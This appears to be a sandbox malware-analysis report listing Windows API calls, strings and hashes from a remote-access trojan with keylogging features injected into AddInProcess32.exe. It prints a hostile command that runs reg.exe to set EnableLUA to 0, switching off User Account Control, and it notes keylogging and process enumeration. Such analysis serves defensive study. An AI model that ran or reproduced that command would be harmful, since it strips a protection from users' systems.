                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: 88$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  • API String ID: 2506810119-4049637526
                                                                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                  • wsprintfW.USER32 ref: 0040B22E
                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: EventLocalTimewsprintf
                                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                  • API String ID: 1497725170-248792730
                                                                                                  • Opcode ID: f6bdf37b764397ecfd397d8500b9a2d9bfc283fa5d72d0792e8994da5c0756f8
                                                                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                  • Opcode Fuzzy Hash: f6bdf37b764397ecfd397d8500b9a2d9bfc283fa5d72d0792e8994da5c0756f8
                                                                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                                                  • String ID: hQG
                                                                                                  • API String ID: 1958988193-4070439852
                                                                                                  • Opcode ID: dff8f098f1c377594146863248cdb80fbfdf91f527f5f89ea2521ad03e4bff88
                                                                                                  • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                                                                                  • Opcode Fuzzy Hash: dff8f098f1c377594146863248cdb80fbfdf91f527f5f89ea2521ad03e4bff88
                                                                                                  • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F
                                                                                                  APIs
                                                                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                  • String ID: 0$MsgWindowClass
                                                                                                  • API String ID: 2877667751-2410386613
                                                                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                  Strings
                                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                  • API String ID: 2922976086-4183131282
                                                                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002), ref: 004433FA
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002), ref: 00443430
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                  APIs
                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474F08,00404E7A,00000001,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 00405120
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 0040512C
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 00405137
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000), ref: 00405140
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                  • String ID: KeepAlive | Disabled
                                                                                                  • API String ID: 2993684571-305739064
                                                                                                  • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                  • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                  • String ID: Alarm triggered
                                                                                                  • API String ID: 614609389-2816303416
                                                                                                  • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                  • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                                  Strings
                                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                  • API String ID: 3024135584-2418719853
                                                                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                  • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 4269425633-0
                                                                                                  • Opcode ID: db79130361b4b0464cab85a352f134925f668321788b49065da1d952b70fcd3f
                                                                                                  • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                                                                                  • Opcode Fuzzy Hash: db79130361b4b0464cab85a352f134925f668321788b49065da1d952b70fcd3f
                                                                                                  • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,?,00000001,0043F918,?), ref: 004511F9
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043AF04,?), ref: 00451294
                                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 313313983-0
                                                                                                  • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                  • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                  • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1852769593-0
                                                                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                                                                  • _free.LIBCMT ref: 00448353
                                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00448387
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00448390
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00450A54
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 00450A66
                                                                                                  • _free.LIBCMT ref: 00450A78
                                                                                                  • _free.LIBCMT ref: 00450A8A
                                                                                                  • _free.LIBCMT ref: 00450A9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00444106
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 00444118
                                                                                                  • _free.LIBCMT ref: 0044412B
                                                                                                  • _free.LIBCMT ref: 0044413C
                                                                                                  • _free.LIBCMT ref: 0044414D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                  APIs
                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                                                                                  • IsWindowVisible.USER32(?), ref: 00417677
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                  • String ID: (VG
                                                                                                  • API String ID: 3142014140-3443974315
                                                                                                  • Opcode ID: 7e572b315b2ecefe35e30865a6849592f1677189f3bed39c221b32fb02a916d3
                                                                                                  • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                                                                                  • Opcode Fuzzy Hash: 7e572b315b2ecefe35e30865a6849592f1677189f3bed39c221b32fb02a916d3
                                                                                                  • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                                                                                  APIs
                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$InfoQueryValue
